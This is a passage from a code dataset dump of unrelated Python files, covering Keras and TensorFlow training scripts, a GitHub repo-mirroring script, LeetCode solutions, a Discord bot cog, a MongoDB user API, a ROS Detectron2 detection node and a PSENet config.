padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dropout(.25))\r\n\r\nmodel.add(Convolution2D(filters=256, kernel_size=(1, 1), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Convolution2D(filters=128, kernel_size=(3, 3),\r\n strides=(2, 2), padding='same'))\r\n\r\nmodel.add(Convolution2D(filters=256, kernel_size=(1, 1), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Convolution2D(filters=num_labels, kernel_size=(3, 3),\r\n strides=(2, 2), padding='same'))\r\n\r\nmodel.add(Flatten())\r\nmodel.add(Activation(\"softmax\"))\r\nmodel.summary()\r\n\r\n# # Create the model\r\n# model = Sequential()\r\n# model.add(Conv2D(32, kernel_size=(3, 3), activation='relu',kernel_regularizer=regularizers.l2(0.0001),input_shape=(48,48,1)))\r\n# # model.add(BatchNormalization())\r\n# model.add(Conv2D(64, kernel_size=(3, 3), activation='relu',kernel_regularizer=regularizers.l2(0.0001)))\r\n# # model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2)))\r\n# model.add(Conv2D(128, kernel_size=(3, 3), activation='relu', kernel_regularizer=regularizers.l2(0.0001)))\r\n# # model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2)))\r\n# model.add(Conv2D(128, kernel_size=(3, 3), activation='relu', kernel_regularizer=regularizers.l2(0.0001)))\r\n# # model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2)))\r\n# model.add(Conv2D(7, kernel_size=(1, 1), activation='relu', kernel_regularizer=regularizers.l2(0.0001)))\r\n# # # model.add(BatchNormalization())\r\n# model.add(Conv2D(7, kernel_size=(4, 4), activation='relu', kernel_regularizer=regularizers.l2(0.0001)))\r\n# # model.add(BatchNormalization())\r\n\r\n# model.add(Flatten())\r\n# model.add(Activation(\"softmax\"))\r\n# model.summary()\r\n\r\n# model = Sequential()\r\n\r\n# model.add(Conv2D(num_features, kernel_size=(3, 3), activation='relu', input_shape=(width, height, 1), data_format='channels_last', kernel_regularizer=l2(0.01)))\r\n# model.add(Conv2D(num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\r\n# model.add(Dropout(0.5))\r\n\r\n# model.add(Conv2D(2*num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(Conv2D(2*num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\r\n# model.add(Dropout(0.5))\r\n\r\n# model.add(Conv2D(2*2*num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(Conv2D(2*2*num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\r\n# model.add(Dropout(0.5))\r\n\r\n# model.add(Conv2D(2*2*2*num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(Conv2D(2*2*2*num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\r\n# model.add(Dropout(0.5))\r\n\r\n# model.add(Flatten())\r\n\r\n# model.add(Dense(2*2*2*num_features, activation='relu'))\r\n# model.add(Dropout(0.4))\r\n# model.add(Dense(2*2*num_features, activation='relu'))\r\n# model.add(Dropout(0.4))\r\n# model.add(Dense(2*num_features, activation='relu'))\r\n# model.add(Dropout(0.5))\r\n\r\n# model.add(Dense(num_labels, activation='softmax'))\r\n\r\n# # Mostra o sumario da rede\r\n# model.summary()\r\nmodel.compile(loss=categorical_crossentropy,\r\n #optimizer=Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-7),\r\n optimizer=Adam(lr=0.0001, decay=1e-6),\r\n metrics=['accuracy'])\r\n\r\n#tensorboard = TensorBoard(log_dir='./logs')\r\nlr_reducer = ReduceLROnPlateau(monitor='val_loss', factor=0.9, patience=3, verbose=1)\r\nearly_stopper = EarlyStopping(monitor='val_loss', min_delta=0, patience=8, verbose=1, mode='auto')\r\ncheckpointer = ModelCheckpoint(MODELPATH, monitor='val_loss', verbose=1, save_best_only=True)\r\n\r\nmodel.fit(np.array(X_train), np.array(y_train),\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n verbose=1,\r\n validation_data=(np.array(X_test), np.array(y_test)),\r\n shuffle=True,\r\n callbacks=[lr_reducer, early_stopper, checkpointer])\r\n #callbacks=[lr_reducer, tensorboard, early_stopper, checkpointer])\r\n\r\nscores = model.evaluate(np.array(X_test), np.array(y_test), batch_size=batch_size)\r\nprint(\"Loss: \" + str(scores[0]))\r\nprint(\"Accuracy: \" + str(scores[1]))","sub_path":"emotion_training.py","file_name":"emotion_training.py","file_ext":"py","file_size_in_byte":8174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"175796839","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nf = open('op4.txt')\nA = f.readlines()\nf.close()\n\nA = [l.strip('\\n') for l in A]\n\nloss = []\ntr_a = []\nval_a = []\n\nQ = []\nR = []\nfor i in range(len(A)):\n\tif 'epoch' in A[i]:\n\t\tQ.append(A[i])\n\telse:\n\t\tR.append(A[i])\n\nfor i in range(len(R)):\n\t#print R[i]\n\t_,sep,Vals = R[i].rpartition('loss ')\n\tvals,_,tr_val = Vals.partition(' ')\n\ttr,_,val = tr_val.rpartition(' ')\n\t#print vals\n\tloss.append(float(vals))\n\t#tr_a.append(float(tr))\n\t#val_a.append(float(val))\n\ntr_a = []\nval_a = []\nfor i in range(len(Q)):\n\t_,sep,t_a = Q[i].rpartition('training: ')\n\tt_a,_,_ = t_a.partition(' ')\n\t_,sep,v_a = Q[i].rpartition('validation: ')\n\ttr_a.append(float(t_a))\n\tval_a.append(float(v_a))\n\n\nsns.set_style(\"darkgrid\")\n#sns.distplot(loss, color='g')\nplt.plot(loss, color='g', label='loss')\n#plt.plot(tr_a, color='r', label='training accuracy')\n#plt.plot(val_a, color='b', label='validation accuracy')\nplt.legend(loc='upper right')\nplt.xlabel('iteration')\nplt.ylabel('loss')\nplt.title('loss vs iteration')\nplt.show()\n\nsns.set_style(\"darkgrid\")\nplt.plot(tr_a, color='r', label='training accuracy')\nplt.plot(val_a, color='b', label='validation accuracy')\nplt.legend(loc='upper right')\nplt.xlabel('iteration')\nplt.ylabel('accuracy')\nplt.title('accuracy vs iteration')\nplt.show()","sub_path":"vis_loss.py","file_name":"vis_loss.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"529668891","text":"import tensorflow as tf\nimport numpy as np\nimport time\nimport matplotlib.pylab as plt\n\ntf_dtype = tf.float16\nnp_dtype = np.float16\ntotal_data_size = 1000\ntraining_data_size = 500\ntraining_iterations = 1000\nlr = 0.1\n\nfor initial_data in range(1):\n np.random.seed(1)\n data_size = int(total_data_size / 2)\n data_set_0_x1 = (np.random.randn(data_size).astype(np_dtype) + 5).reshape(-1, 1)\n data_set_0_x2 = (np.random.randn(data_size).astype(np_dtype) + 5).reshape(-1, 1)\n data_set_0_x = np.hstack((data_set_0_x1, data_set_0_x2))\n data_set_0_y = (np.zeros(data_size).astype(np_dtype)).reshape(-1, 1)\n data_set_1_x1 = (np.random.randn(data_size).astype(np_dtype) + 2).reshape(-1, 1)\n data_set_1_x2 = (np.random.randn(data_size).astype(np_dtype) + 2).reshape(-1, 1)\n data_set_1_x = np.hstack((data_set_1_x1, data_set_1_x2))\n data_set_1_y = (np.ones(data_size).astype(np_dtype)).reshape(-1, 1)\n data_set_x = np.vstack((data_set_0_x, data_set_1_x))\n data_set_y = np.vstack((data_set_0_y, data_set_1_y))\n data_set = np.hstack((data_set_x, data_set_y))\n np.random.shuffle(data_set)\n plt.ion()\n subplot1 = plt.subplot(121)\n plt.scatter(data_set[data_set[:, 2] == 0, 0], data_set[data_set[:, 2] == 0, 1], c='g')\n plt.scatter(data_set[data_set[:, 2] == 1, 0], data_set[data_set[:, 2] == 1, 1], c='r')\n # plt.show()\n\nwith tf.name_scope('data_set'):\n train_x, train_y = data_set[:training_data_size, :2], data_set[:training_data_size, 2].reshape(-1, 1)\n test_x, test_y = data_set[training_data_size:, :2], data_set[training_data_size:, 2].reshape(-1, 1)\n\nx = tf.placeholder(dtype=tf_dtype, shape=[training_data_size, 2], name='x')\ny = tf.placeholder(dtype=tf_dtype, shape=[training_data_size, 1], name='y')\n\nwith tf.name_scope('model'):\n weight_1 = tf.Variable(0.1 * tf.truncated_normal(shape=[2, 1], dtype=tf_dtype, name='randomize'), name='weight_1')\n bias_1 = tf.Variable(0.1 * tf.truncated_normal(shape=[1], dtype=tf_dtype, name='randomize'), name='bias_1')\n prediction = tf.nn.sigmoid(tf.add(tf.matmul(x, weight_1), bias_1), name='sigmoid_model')\n\nwith tf.name_scope('cost'):\n cost = tf.reduce_mean(tf.pow(prediction - y, 2), name='cost')\n\nwith tf.name_scope('train'):\n optimizer = tf.train.AdamOptimizer(learning_rate=lr, epsilon=1e-3).minimize(cost)\n\ntf.summary.scalar('cost', cost)\nsummary_op = tf.summary.merge_all()\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n writer = tf.summary.FileWriter('./sigmoid_regression', graph=sess.graph)\n for iteration in range(training_iterations):\n _, s = sess.run([optimizer, summary_op], feed_dict={x: train_x, y: train_y})\n writer.add_summary(s, iteration)\n if iteration % 20 == 0:\n c, p_tr = sess.run([cost, prediction], feed_dict={x: train_x, y: train_y})\n p_te = sess.run(prediction, feed_dict={x: test_x, y: test_y})\n print(\n 'iteration:', iteration,\n 'cost:', c,\n 'training accuracy:', np.sum((p_tr[:, 0] >= 0.5) == (train_y[:, 0] == 1)) / training_data_size,\n 'testing accuracy:', np.sum((p_te[:, 0] >= 0.5) == (test_y[:, 0] == 1)) / (total_data_size - training_data_size),\n )\n subplot2 = plt.subplot(122)\n plt.scatter(test_x[p_te[:, 0] < 0.5, 0], test_x[p_te[:, 0] < 0.5, 1], c='g')\n plt.scatter(test_x[p_te[:, 0] >= 0.5, 0], test_x[p_te[:, 0] >= 0.5, 1], c='r')\n plt.pause(0.2)\n if iteration != training_iterations - 20:\n subplot2.cla()\nplt.ioff()\nplt.show()\nsess.close()\nwriter.close()\n","sub_path":"2-basic-models/sigmoid-regression.py","file_name":"sigmoid-regression.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"423153802","text":"#!/usr/bin/python\nimport os\nfrom github import Github\nfrom sh import git, pushd\n\nmirror_base_url = open(\"mirror_url\", \"r\").read()[:-1]\norigin_token = open(\"origin_token\", \"r\").read()[:-1]\norigin_ssh_key = os.path.dirname(os.path.realpath(__file__)) + \"/origin_key\"\n\ntry:\n os.mkdir(\"./repos\", mode=0o700)\nexcept FileExistsError:\n pass\n\n# origin should be a GitHub repository\nfor repo in Github(origin_token).get_user().get_repos():\n d = f\"./repos/{repo.name}\"\n try:\n os.mkdir(d, mode=0o700)\n except FileExistsError:\n continue\n with pushd(d):\n git.init(\"--bare\")\n # add origin remote\n git.remote.add(\"origin\", repo.ssh_url)\n # set ref\n git.config(\"remote.origin.fetch\", \"+refs/heads/*:refs/heads/*\")\n git.config(\"remote.origin.fetch\", \"+refs/tags/*:refs/tags/*\", \"--add\")\n git.config(\"remote.origin.mirror\", \"true\")\n git.fetch(\"origin\", _env={\"GIT_SSH_COMMAND\": f\"ssh -i {origin_ssh_key}\"})\n # add remote url\n git.remote.add(\"mirror\", mirror_base_url+repo.name+\".git\", \"--mirror\")\n print(f\"repo added {repo.name}\")\n","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"9200260","text":"\"\"\"\nDP思想:\n需要找出给定数组中两个数字之间的最大差值(最小谷之后的最大峰)\n前i天的最大收益 = max{前i-1天的最大收益,第i天的价格-前i-1天中的最小价格}\n\n\"\"\"\n\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n le = len(prices)\n if le == 0:\n return 0\n # 问题的状态:用两个变量,一个存储当前最大的收益,一个存储当前的最小值。\n min_p, max_p = prices[0], 0\n\n for i in range(le):\n # 转移方程\n # 比较之前最小值和当前值,更新最小值\n if prices[i] < min_p:\n min_p = prices[i]\n elif prices[i] - min_p > max_p:\n # 比较之前最大利润和当前利润,更新最大利润\n max_p = prices[i] - min_p\n\n return max_p\n\n","sub_path":"Dynamic programming/121. Best Time to Buy and Sell Stock.py","file_name":"121. Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"418692427","text":"from talon import Context, actions\n\nctx = Context()\n\n\n@ctx.action_class(\"core\")\nclass Actions:\n def run_talon_script(ctx, script, m):\n with ctx:\n print(ctx)\n print(script)\n print(m)\n script.run(actions, namespace=m)\n","sub_path":"debug/emit_context_handler.py","file_name":"emit_context_handler.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"652158095","text":"import logging\r\nimport asyncio\r\nfrom datetime import datetime\r\nfrom discord.ext import commands\r\nfrom utils.database import Database\r\nfrom asyncpg import exceptions\r\nfrom utils import checks\r\n\r\nlog = logging.getLogger(__name__)\r\nloop = asyncio.get_event_loop()\r\n\r\nclass CustomCommand(Database):\r\n def __init__(self, tweety):\r\n self.bot = tweety\r\n self.cc_map = {}\r\n super().__init__(self.bot.pool)\r\n loop.create_task(self.populate_commands())\r\n\r\n @commands.group(hidden=True)\r\n async def cc(self, ctx):\r\n pass\r\n\r\n @checks.is_admin()\r\n @cc.command(aliases=['create'])\r\n async def add(self, ctx, trigger_word: str, trigger_text: str):\r\n params = [\r\n ctx.message.author.id,\r\n trigger_word.lower(),\r\n trigger_text,\r\n datetime.now(),\r\n ctx.message.guild.id,\r\n ]\r\n\r\n try:\r\n await self.execute('INSERT INTO custom_command (member_id, trigger_word, trigger_text, timestamp, server_id) '\r\n 'VALUES ($1, $2, $3, $4, $5)', params)\r\n except exceptions.UniqueViolationError:\r\n await ctx.send('```[ERROR] {}```'.format('A custom command with that name already exist.'))\r\n except Exception as err:\r\n log.error(err)\r\n else:\r\n if ctx.guild.id in self.cc_map.keys():\r\n self.cc_map[ctx.guild.id][trigger_word.lower()] = trigger_text\r\n else:\r\n self.cc_map[ctx.guild.id] = {trigger_word.lower(): trigger_text}\r\n await ctx.send('```[INFO] {}```'.format('Custom command successfully created.'))\r\n\r\n @checks.is_admin()\r\n @cc.command(aliases=['change', 'update'])\r\n async def edit(self, ctx, trigger_word: str, trigger_text: str):\r\n try:\r\n ret = await self.execute('UPDATE custom_command '\r\n 'SET trigger_text = $1 '\r\n 'WHERE trigger_word = $2 AND server_id = $3', [trigger_text,\r\n trigger_word,\r\n ctx.guild.id])\r\n except Exception as err:\r\n log.error(err)\r\n else:\r\n if int(ret[-1:]):\r\n self.cc_map[ctx.guild.id][trigger_word] = trigger_text\r\n await ctx.send('```[INFO] Custom command \"{}\" updated successfully.```'.format(trigger_word))\r\n else:\r\n await ctx.send('```[ERROR] Could not update custom command \"{}\". '\r\n 'Are you sure it exist on this guild?```'.format(trigger_word))\r\n\r\n @checks.is_admin()\r\n @cc.command(aliases=['remove', 'purge'])\r\n async def delete(self, ctx, trigger_word: str):\r\n try:\r\n ret = await self.execute('DELETE FROM custom_command '\r\n 'WHERE server_id = $1 '\r\n 'AND trigger_word = $2', [ctx.guild.id, trigger_word])\r\n except Exception as err:\r\n log.error(err)\r\n else:\r\n if int(ret[-1:]):\r\n del self.cc_map[ctx.guild.id][trigger_word]\r\n await ctx.send('```[INFO] Custom command \"{}\" removed from database successfully.```'.format(trigger_word))\r\n else:\r\n await ctx.send('```[ERROR] Could not delete custom command \"{}\". Are you sure it exist?```'.format(trigger_word))\r\n\r\n @cc.command(name='list')\r\n async def _list(self, ctx): # Use internal cc_map instead.\r\n try:\r\n res = await self.query('SELECT trigger_word '\r\n 'FROM custom_command '\r\n 'WHERE server_id = $1', [ctx.guild.id])\r\n except Exception as err:\r\n log.error(err)\r\n else:\r\n if len(res) > 0:\r\n await ctx.send('**Custom Commands**\\n```{}```'.format(', '.join([x['trigger_word'] for x in res])))\r\n else:\r\n await ctx.send('```[INFO] Could not find any custom commands for this guild.```')\r\n\r\n\r\n async def populate_commands(self):\r\n try:\r\n commands = await self.query('SELECT trigger_word, trigger_text, server_id '\r\n 'FROM custom_command', [])\r\n except Exception as err:\r\n log.error(err)\r\n else:\r\n for cmd in commands:\r\n if cmd['server_id'] in self.cc_map:\r\n self.cc_map[cmd['server_id']].update({\r\n cmd['trigger_word']: cmd['trigger_text']\r\n })\r\n else:\r\n self.cc_map[cmd['server_id']] = {\r\n cmd['trigger_word']: cmd['trigger_text']\r\n }\r\n\r\n async def on_message(self, message):\r\n if message.author.bot:\r\n return\r\n try:\r\n reply = self.cc_map[message.guild.id][message.content.lower()]\r\n except KeyError:\r\n pass\r\n except Exception as err:\r\n log.error(err)\r\n pass\r\n else:\r\n await message.channel.send(reply)\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(CustomCommand(bot))\r\n","sub_path":"cogs/customcommand.py","file_name":"customcommand.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"166179607","text":"import pymongo\nfrom bson.json_util import dumps\nimport requests\nimport json\nimport dns\nimport os\n\nurl = os.environ.get(\"mongoURL\")+\"/sd-db?retryWrites=true&w=majority\"\nclient = pymongo.MongoClient(url)\n\ndb = client.get_default_database()\nusers = db['users']\n\nurlBase = 'https://api.github.com'\n\n\n# Return all the users from the database, you can access using a GET /users\ndef read():\n return dumps(users.find({},{\"_id\":0}))\n\n\ndef insert(name):\n # User name is empty\n if name.strip() != \"\":\n # Users exists in the data base\n\n if users.find({\"name\": name}).count() == 0:\n\n r = requests.get(urlBase + \"/users/\" + name)\n # Users is a github user\n if r.status_code == 200:\n response = json.loads(r.content)\n numRepos = response[\"public_repos\"]\n result = users.insert_one({\"name\": name, \"numRepos\": numRepos})\n data = {\"id\": result.inserted_id, \"numRepos\": numRepos}\n return dumps(data)\n else:\n return 'Bad request', 400, {\n 'exists-gh-error':\n 'The name of the user given is not in the GitHub database'\n }\n else:\n return 'Bad request', 400, {\n 'exists-error': 'The users exists in the database'\n }\n else:\n return 'Bad request', 400, {\n 'empty-error': 'The name of the user given can not be empty'\n }\n\n\ndef delete(name):\n # User name is empty\n if name.strip() != \"\":\n\n # Users exists in the data base\n if users.find({\"name\": name}).count() == 1:\n\n users.remove({\"name\": name})\n return 200\n else:\n return 'Bad request', 400, {\n 'exists-error': 'The users do not exists in the database'\n }\n else:\n return 'Bad request', 400, {\n 'empty-error': 'The name of the user given can not be empty'\n }\n","sub_path":"src/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"534648218","text":"import detectron2\nfrom detectron2.utils.logger import setup_logger\nsetup_logger()\n\n# import from common libraries\nimport numpy as np \nfrom scipy.stats import multivariate_normal\n\n# import some common detectron2 utilities\nfrom detectron2 import model_zoo\nfrom detectron2.engine import DefaultPredictor\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import Visualizer\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\n\nimport rclpy\nfrom rclpy.node import Node\n\nfrom sensor_msgs.msg import Image, PointCloud2 \nfrom nav2_dynamic_msgs.msg import Obstacle, ObstacleArray\nfrom geometry_msgs.msg import Pose, Point\nfrom detectron2_detector.utils import NMS_3D\n\nclass Detectron2Detector(Node):\n '''use Detectron2 to detect object masks from 2D image and estimate 3D position with Pointcloud2 data\n '''\n def __init__(self):\n super().__init__('detectron_node')\n self.declare_parameters(\n namespace='',\n parameters=[\n ('detectron_config_file', \"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\"),\n ('detectron_score_thresh', 0.8),\n ('pointcloud2_topic', \"/camera/depth/points\"),\n ('pc_downsample_factor', 16),\n ('min_mask', 20),\n ('categories', [0]),\n ('nms_filter', 0.3),\n ('outlier_thresh', 0.5)\n ])\n self.pc_downsample_factor = int(self.get_parameter(\"pc_downsample_factor\")._value)\n self.min_mask = self.get_parameter(\"min_mask\")._value\n self.categories = self.get_parameter(\"categories\")._value\n self.nms_filter = self.get_parameter(\"nms_filter\")._value\n self.outlier_thresh = self.get_parameter(\"outlier_thresh\")._value\n\n # setup detectron model\n self.cfg = get_cfg()\n config_file = self.get_parameter(\"detectron_config_file\")._value\n self.cfg.merge_from_file(model_zoo.get_config_file(config_file))\n self.cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = self.get_parameter(\"detectron_score_thresh\")._value\n self.cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(config_file)\n self.predictor = DefaultPredictor(self.cfg)\n\n # subscribe to sensor \n self.subscription = self.create_subscription(\n PointCloud2,\n self.get_parameter(\"pointcloud2_topic\")._value,\n self.callback,\n 1)\n\n # setup publisher\n self.detect_obj_pub = self.create_publisher(ObstacleArray, 'detection', 2)\n self.detect_img_pub = self.create_publisher(Image, 'image', 2)\n\n self.count = -1\n\n def outlier_filter(self, x, y, z, idx):\n '''simple outlier filter, assume Gaussian distribution and drop points with low probability (too far away from center)'''\n mean = [np.mean(x), np.mean(y), np.mean(z)]\n cov = np.diag([np.var(x), np.var(y), np.var(z)])\n rv = multivariate_normal(mean, cov)\n points = np.dstack((x, y, z))\n p = rv.pdf(points)\n return idx[p > self.outlier_thresh]\n\n def callback(self, msg):\n # check if there is subscirbers\n if self.detect_obj_pub.get_subscription_count() == 0 and self.detect_img_pub.get_subscription_count() == 0:\n return\n\n # extract data from msg\n height = msg.height\n width = msg.width\n points = np.array(msg.data, dtype = 'uint8')\n\n # decode rgb image\n rgb_offset = msg.fields[3].offset\n point_step = msg.point_step\n r = points[rgb_offset::point_step]\n g = points[(rgb_offset+1)::point_step]\n b = points[(rgb_offset+2)::point_step]\n img = np.concatenate([r[:, None], g[:, None], b[:, None]], axis = -1)\n self.img = img.reshape((height, width, 3))\n\n # decode point cloud data\n if msg.fields[0].datatype < 3:\n byte = 1\n elif msg.fields[0].datatype < 5:\n byte = 2\n elif msg.fields[0].datatype < 8:\n byte = 4\n else:\n byte = 8\n points = points.view('<f' + str(byte))\n x = points[0::int(self.pc_downsample_factor * point_step / byte)]\n y = points[1::int(self.pc_downsample_factor * point_step / byte)]\n z = points[2::int(self.pc_downsample_factor * point_step / byte)]\n\n self.points = [x, y, z]\n self.header = msg.header\n\n # call detect function\n self.detect()\n\n def process_points(self, outputs):\n '''estimate 3D position and size with detectron output and pointcloud data'''\n x, y, z = self.points\n\n # map mask to point cloud data\n num_classes = outputs['instances'].pred_classes.shape[0]\n if num_classes == 0:\n self.detect_obj_pub.publish(ObstacleArray())\n return\n\n masks = outputs[\"instances\"].pred_masks.cpu().numpy().astype('uint8').reshape((num_classes, -1))[:, ::self.pc_downsample_factor]\n scores = outputs[\"instances\"].scores.cpu().numpy().astype(np.float)\n\n # estimate 3D position with simple averaging of obstacle's points\n detections = []\n for i in range(num_classes):\n # if user does not specify any interested category, keep all; else select those interested objects\n if (len(self.categories) == 0) or (outputs[\"instances\"].pred_classes[i] in self.categories):\n idx = np.where(masks[i])[0]\n idx = self.outlier_filter(x[idx], y[idx], z[idx], idx)\n if idx.shape[0] < self.min_mask:\n continue\n obstacle_msg = Obstacle()\n # pointcloud2 data has a different coordinate, swap y and z\n # use (max+min)/2 can avoid the affect of unbalance of points density instead of average\n x_max = x[idx].max()\n x_min = x[idx].min()\n y_max = y[idx].max()\n y_min = y[idx].min()\n z_max = z[idx].max()\n z_min = z[idx].min()\n obstacle_msg.score = scores[i]\n obstacle_msg.position.x = np.float((x_max + x_min) / 2)\n obstacle_msg.position.y = np.float((y_max + y_min) / 2)\n obstacle_msg.position.z = np.float((z_max + z_min) / 2)\n obstacle_msg.size.x = np.float(x_max - x_min)\n obstacle_msg.size.y = np.float(y_max - y_min)\n obstacle_msg.size.z = np.float(z_max - z_min)\n detections.append(obstacle_msg)\n\n return detections\n\n def detect(self):\n # call detectron2 model\n outputs = self.predictor(self.img)\n\n # process pointcloud to get 3D position and size\n detections = self.process_points(outputs)\n\n # publish detection result \n obstacle_array = ObstacleArray()\n obstacle_array.header = self.header\n if self.detect_obj_pub.get_subscription_count() > 0:\n obstacle_array.obstacles = detections\n self.detect_obj_pub.publish(obstacle_array)\n\n # visualize detection with detectron API\n if self.detect_img_pub.get_subscription_count() > 0:\n v = Visualizer(self.img[:, :, ::-1], MetadataCatalog.get(self.cfg.DATASETS.TRAIN[0]), scale=1)\n out = v.draw_instance_predictions(outputs[\"instances\"].to(\"cpu\"))\n out_img = out.get_image()[:, :, ::-1]\n out_img_msg = Image()\n out_img_msg.header = self.header\n out_img_msg.height = out_img.shape[0]\n out_img_msg.width = out_img.shape[1]\n out_img_msg.encoding = 'rgb8'\n out_img_msg.step = 3 * out_img.shape[1]\n out_img_msg.data = out_img.flatten().tolist()\n self.detect_img_pub.publish(out_img_msg)\n \ndef main():\n rclpy.init(args = None)\n node = Detectron2Detector()\n node.get_logger().info(\"start spining detectron_node...\")\n \n rclpy.spin(node)\n\n rclpy.shutdown()\n\nif __name__ == '__main__':\n main()\n","sub_path":"detectron2_detector/detectron2_detector/detectron2_node.py","file_name":"detectron2_node.py","file_ext":"py","file_size_in_byte":7967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"98283200","text":"# -*- coding: utf-8 -*-\r\n# @Time : 2019/1/3 17:40\r\n# @Author : zhoujun\r\n\r\n# data config\r\ntrainroot = 'Training Set'\r\ntestroot = 'Test Set'\r\noutput_dir = '/content/drive/My Drive/PSENet_2'\r\npretrained_path = '/content/drive/My Drive/PSENet_2/PSENet_resnet50.pth'\r\ndata_shape = 640\r\n\r\n# train config\r\ngpu_id = '0'\r\nworkers = 0\r\nstart_epoch = 0\r\nepochs = 300\r\n\r\ntrain_batch_size = 4\r\n\r\nlr = 1e-6\r\nend_lr = 1e-6\r\nlr_gamma = 0.1\r\nlr_decay_step = [100,200]\r\nweight_decay = 5e-4\r\nwarm_up_epoch = 6\r\nwarm_up_lr = lr * lr_gamma\r\n\r\ndisplay_input_images = False\r\ndisplay_output_images = False\r\ndisplay_interval = 10\r\nshow_images_interval = 50\r\n\r\npretrained = False\r\nrestart_training = False\r\ncheckpoint = ''\r\n\r\n# net config\r\nbackbone = 'resnet50'\r\nLambda = 0.7\r\nn = 6\r\nm = 0.5\r\nOHEM_ratio = 3\r\nscale = 1\r\n# random seed\r\nseed = 2\r\n\r\n\r\ndef print():\r\n from pprint import pformat\r\n tem_d = {}\r\n for k, v in globals().items():\r\n if not k.startswith('_') and not callable(v):\r\n tem_d[k] = v\r\n return pformat(tem_d)\r\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"37090824","text":"\"\"\"\nGiven a linked list, reverse the nodes of a linked list k at a time and return its modified list.\n\nk is a positive integer and is less than or equal to the length of the linked list. If the number of nodes is not a multiple of k then left-out nodes in the end should remain as it is.\n\nExample:\n\nGiven this linked list: 1->2->3->4->5\n\nFor k = 2, you should return: 2->1->4->3->5\n\nFor k = 3, you should return: 3->2->1->4->5\n\nNote:\n\nOnly constant extra memory is allowed.\nYou may not alter the values in the list's nodes, only nodes itself may be changed.\n\n\"\"\"\nfrom typing import List\n\n# Definition for singly-linked list.\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n dummy = ListNode(None)\n c = dummy\n p = head\n while 1:\n swap = []\n # populate swap for this k-elements.\n while p is not None and len(swap) != k:\n swap.append(p)\n p = p.next\n print([i.val for i in swap])\n # swap\n if len(swap) < k:\n print('len is ', len(swap))\n if len(swap) > 0:\n c.next = swap[0]\n break\n else:\n for i in range(k):\n if i == 0:\n swap[0].next = swap[-1].next\n else:\n swap[i].next = swap[i-1]\n c.next = swap[-1]\n c = swap[0]\n # advance\n p = c.next\n if p is None:\n print('p is none')\n break\n return dummy.next\n\n\na = Solution()\nhead = ListNode(1)\nl2 = ListNode(2)\nl3 = ListNode(3)\nl4 = ListNode(4)\nl5 = ListNode(5)\nhead.next = l2\nl2.next = l3\nl3.next = l4\nl4.next = l5\nout = a.reverseKGroup(head, 6)\nwhile out is not None:\n print(out.val)\n out = out.next\n","sub_path":"leetcode1-115/25. Reverse Nodes in k-Group.py","file_name":"25. Reverse Nodes in k-Group.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"352523300","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCareo spider created on the top of ATSSpider\n\nscrapy crawl careo -a 